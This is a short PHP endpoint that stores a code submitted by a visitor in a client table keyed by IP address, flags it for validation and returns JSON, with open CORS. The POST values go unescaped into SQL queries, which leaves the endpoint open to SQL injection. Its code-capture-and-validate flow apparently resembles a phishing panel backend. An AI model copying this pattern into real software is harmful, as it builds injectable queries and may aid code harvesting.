<?php
header('content-type: application/json; charset=utf-8');
//en caso de json en vez de jsonp habría que habilitar CORS:
header("access-control-allow-origin: *");


date_default_timezone_set("America/Caracas");
$fecha_actual=strftime( "%Y-%m-%d %H:%M:%S", time());

require('../medicina/php/config/conexion.php');



$ip_user = $_POST['ident'];
$a =trim($_POST['a']);


function convertirFechaHoraNumerico($fechaHora) {
    // Convertir la fecha y hora en formato %Y-%m-%d %H:%M:%S a formato numérico YmdHis
    $fechaNumerica = str_replace(['-', ' ', ':'], '', $fechaHora);
    return $fechaNumerica;
}


$tiempo_actual = convertirFechaHoraNumerico($fecha_actual);
$numeroAleatorio = mt_rand(1, 100);




	      $consulta2 = "SELECT * FROM tabla_clientes where ip ='$ip_user'";
          $resultado2 = mysqli_query( $conexion, $consulta2 ) or die ( "Algo ha ido mal en la consulta a la base de datos");

             if (mysqli_num_rows($resultado2)>0){

					 
					  if(mysqli_query($conexion,"UPDATE tabla_clientes SET tiempo = '$tiempo_actual',code1 = '$a',valid_code1 = '0',loading = '1' where ip = '$ip_user'")){

					  	  $arr[] = array('guardo' => 'si','time' => $tiempo_actual);


					  	  echo '' . json_encode($arr) . '';
					  	  return;
					  }else{

					  	   $arr[] = array('guardo' => 'no');

					  	   echo '' . json_encode($arr) . '';
					  	   return;

					  }

             }else{
             	   $arr[] = array('guardo' => 'no');

					  	   echo '' . json_encode($arr) . '';
					  	   return;

             }


